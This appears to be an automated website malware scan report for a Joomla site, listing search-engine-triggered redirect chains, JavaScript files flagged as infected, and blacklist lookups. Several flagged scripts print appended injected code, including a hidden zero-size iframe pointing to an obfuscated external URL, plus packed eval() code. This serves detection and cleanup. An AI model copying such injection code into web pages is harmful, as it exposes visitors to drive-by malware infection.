Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.modelworks.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.modelworks.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 01 Sep 2014 22:33:21 GMT Location: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php Server: nginx/0.7.67 Vary: Accept-Encoding Content-Type: text/html Set-Cookie: _cutt_caches_images=1409610801; expires=Tue, 02-Sep-2014 22:33:21 GMT; path=/ X-Powered-By: PHP/5.2.17 | malicious |
URL: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php (imitation of visitor from search engine) GET /sctcom/cgi-bin/1.php HTTP/1.1 Host: www.totalcarsolution.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 01 Sep 2014 22:33:21 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.modelworks.ru/ | 200 OK Content-Length: 22051 Content-Type: text/html | clean |
http://www.modelworks.ru/plugins/system/jceutilities/js/mediaobject.js | 200 OK Content-Length: 3896 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MediaObject = { version : { 'flash' : '9,0,124,0', 'windowsmedia' : '5,1,52,701', 'quicktime' : '6,0,2,0', 'realmedia' : '7,0,0,0', 'shockwave' : '8,5,1,0' }, init : function(v){ var t = this; for(n in v){ t.version[n] = v[n]; } }, getSite : function(){ var x, s = document.getElementsByTagName('script'); for(x=0; x<s.length; x++){ if(/jceutilities\/js\/mediaobjec p ); } } function writeFlash(p) { MediaObject.flash(p); } function writeShockWave(p) { MediaObject.shockwave(p); } function writeQuickTime(p) { MediaObject.quicktime(p); } function writeRealMedia(p) { MediaObject.realmedia(p); } function writeWindowsMedia(p) { MediaObject.windowsmedia(p); } function writeDivX(p) { MediaObject.divx(p); } ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/plugins/system/jceutilities/js/jquery-126.js | 200 OK Content-Length: 31063 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d|| ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/plugins/system/jceutilities/js/jceutilities-216.js | 200 OK Content-Length: 19934 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict();(function($){$.jceUtilities=function(options){return $.jceUtilities.init(options)};$.jceUtilities.init=function(options){this.options=$.extend({popup:{legacy:0,overlay:1,overlayopacity:0.8,overlaycolor:'#000000',resize:1,icons:1,fadespeed:500,scalespeed:500,width:640,height:480,theme:'standard',themecustom:'',themepath:'plugins/system/jceutilities/themes',hideobjects:1,scrollpopup:1},tooltip:{classname:'tooltip',opacity:1,speed:150,position:'br',offsets:{'x':16,'y':16}} ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/media/system/js/caption.js | 200 OK Content-Length: 2169 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write(unescape( document.write('<iframe src="'+'ht'+'tp://jvm'+'an.cz/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://www.modelworks.ru/templates/yoo_level/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 1578 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Warp=Warp||{};Warp.Base={matchHeight:function(e,d){var c=0;$$(e).each(function(a){var b;if(a.offsetHeight)b=a.offsetHeight;else if(a.style.pixelHeight)b=a.style.pixelHeight;b||(b=0);c=Math.max(c,b)});if(d!=undefined)c=Math.max(c,d);$$(e).each(function(a){var b=a.getStyle("padding-top").toInt()+a.getStyle("padding-bottom").toInt()+a.getStyle("border-top-width").toInt()+a.getStyle("border-bottom-width").toInt();a.setStyle(window.ie6?"height":"min-height",c-b+"px")})}}; Warp.Morph=new Class Warp.Morph.implement(new Options);Warp.BackgroundFx=new Class({initialize:function(e){function d(){c.start({"background-color":b[a]});if(a+1>=b.length)a=0;else a++}this.setOptions({transition:Fx.Transitions.linear,duration:9E3,wait:false,colors:["#FFFFFF","#999999"]},e);var c=(new Element(document.body)).effects(this.options),a=0,b=this.options.colors;d.periodical(this.options.duration*2);d()}});Warp.BackgroundFx.implement(new Options); ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/templates/yoo_level/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1238 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Warp=Warp||{}; Warp.AccordionMenu=new Class({initialize:function(a,c,d){this.setOptions({accordion:"default",onActive:function(b){b.addClass("active");b.getFirst().addClass("active")},onBackground:function(b){b.removeClass("active");b.getFirst().removeClass("active")}},d);this.togs=a;this.elms=c;switch(this.options.accordion){case "slide":this.createSlide();break;default:this.createDefault()}},createDefault:function(){var a={};if(!$defined(this.options.display)&&!$defined(this.op Warp.AccordionMenu.implement(new Options); ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/templates/yoo_level/js/menu.js | 200 OK Content-Length: 841 Content-Type: application/javascript | clean |
http://www.modelworks.ru/templates/yoo_level/js/template.js | 200 OK Content-Length: 3522 Content-Type: application/javascript | clean |
http://www.modelworks.ru/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 3902 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('c 1a=b w({1X:4(q,5){2.1W({1V:w.I,1u:w.I,1x:w.I,1y:w.I,1C:w.I,1f:\'.7\',1e:\'.1U\',1b:\'.1h\',1c:\'.1h-1Y\',1q:\'.1Z\',1l:{o:\'.o\',P:\'.P\'},1p:0,1B:24,Q:s,1t:0,1i: ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru//plugins/system/u24/lytebox/3.22/lytebox.js/ | 404 Not Found Content-Length: 4325 Content-Type: text/html | clean |
http://www.modelworks.ru/test404page.js | 404 Not Found Content-Length: 4325 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=modelworks.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://modelworks.ru/
Result: modelworks.ru is not infected or malware details are not published yet.
Result: modelworks.ru is not infected or malware details are not published yet.